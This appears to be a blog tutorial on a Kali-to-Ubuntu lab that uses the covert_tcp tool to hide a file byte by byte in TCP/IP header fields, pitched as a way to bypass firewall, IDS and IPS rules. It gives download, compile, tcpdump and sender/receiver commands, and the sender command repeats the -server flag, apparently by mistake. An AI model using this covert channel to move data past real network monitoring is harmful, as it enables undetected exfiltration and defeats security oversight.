IDS bypassing

BYPASSING ACCESS CTRL RULES OF FIREWALL, IDS, IPS

Hey everyone,

Today we will be learning how to Bypass Firewall, IDS, IPS to allow certain traffic to get pass through it.

How?

We will be using Many unused and misused fields in TCP/IP to hide and send out our data to bypass the Access Control Rules set by Firewall, Intrusion Detection System(IDS), Intrusion Prevention System(IPS).

So it helps in defeating sniffers when it tries to analyze, but we will be sending data with legitimate looking packets. We will be Using a file Covert_tcp to influence the TCP/IP header so we can send a file one byte at a time to the victim machine. It can Act as a server as well as Client.

LAB REQUIREMENTS: Kali Linux, Ubuntu Machine as VM.

Let’s do this,

STEP 1:- Fire up Your Machines Kali linux and Ubuntu.

STEP 2:- In kali linux, open terminal and Navigate to Desktop Using “cd Desktop”, then create a folder by “mkdir send” , then Navigate to the send directory by “cd send“.

STEP 3:– Create a text file with a secret message of your own for testing purpose, use this command “echo “secret message” > message.txt” and hit enter.

STEP 4:- Now we need that covert_tcp file to manipulate TCP/IP header, You can Download it from the below link(Raw link) using wget command

https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c

save that file in send folder we created earlier.

STEP 5:- Now we need to compile it using this command, use cc -o covert_tcp covert_tcp.c and hit Enter as shown below.

STEP 6:- Now switch to ubuntu Machine and open Terminal and note down your IP by using ifconfig

STEP 7:- change into as super user by using sudo su give the password then hit enter

STEP 8:- In this step we will be setting up tcpdump sniffer to capture the packets using tcpdump -nvvX port 8888 -i lo

leave it and open one more terminal

STEP 9:- Same as in Kali Navigate to Desktop and create a folder named as Received and get in to the folder in ubuntu.

STEP 10:- Then same as in kali download that covert_tcp.c file from the link I posted earlier using wget

STEP 11:- Then compile the C file to make use of it further, using cc -o covert_tcp covert_tcp.c

STEP 12:- Here we will be setting up as receiver(listener) for packets by using ./covert_tcp -dest 192.168.0.123(ubuntu ip) -source 192.168.0.122(kali) -source_port 9999(kali) -dest_port 8888(ubuntu) -server -file /home/UserName/Desktop/receive/receive.txt and hit enter.

It will be listening for the packets.

STEP 13:- In kali Open WIreshark and choose the eth0 interface then double click it. if it prompts for Lua error click ok.

STEP 14:- Now we will be sending the message from kali to ubuntu using covert_tcp file by using ./covert_tcp -dest 192.168.0.123(ubuntu ip) -source 192.168.0.122(kali) -source_port 8888(kali) -dest_port 9999(ubuntu) -server -file /root/Desktop/send/message.txt and hit Enter.

U can see the data is transferring through packets one by one.

STEP 15:- Now we can open ubuntu and stop the tcpdump process by using CTRL + C.

STEP 16:- We can also see that data are receiving via data one by one.

STEP 17:- Now switch to kali and check wire shark for data packets, use tcp in filters to show only tcp connections, an d inspect the data transfers between Kali and Ubuntu IP. (192.168.0.122, 192.168.0.123).

STEP 18:- Here Message file is transferred as characters in each packet, we can see that Covert_tcp alters the header of tcp packets and replaced it with the characters at a time to send it without even being detected.

STEP 19:- In Ubuntu machine we can even inspect that receive.txt file where the whole message is received as in Kali machine.

Attackers will use this Technique to bypass firewall, IDS, IPS control Rules access control rules set. So We need to be Sure in setting up of Rules and conditions in Firewalls, IDS, and IPS to prevent these kind of Techniques.

We can use this technique to transfer a message and also some data undetectedly.

So that’s it for Today, See you guys in another Blog.

Bye Bye!

Leave a Comment

Your email address will not be published. Required fields are marked *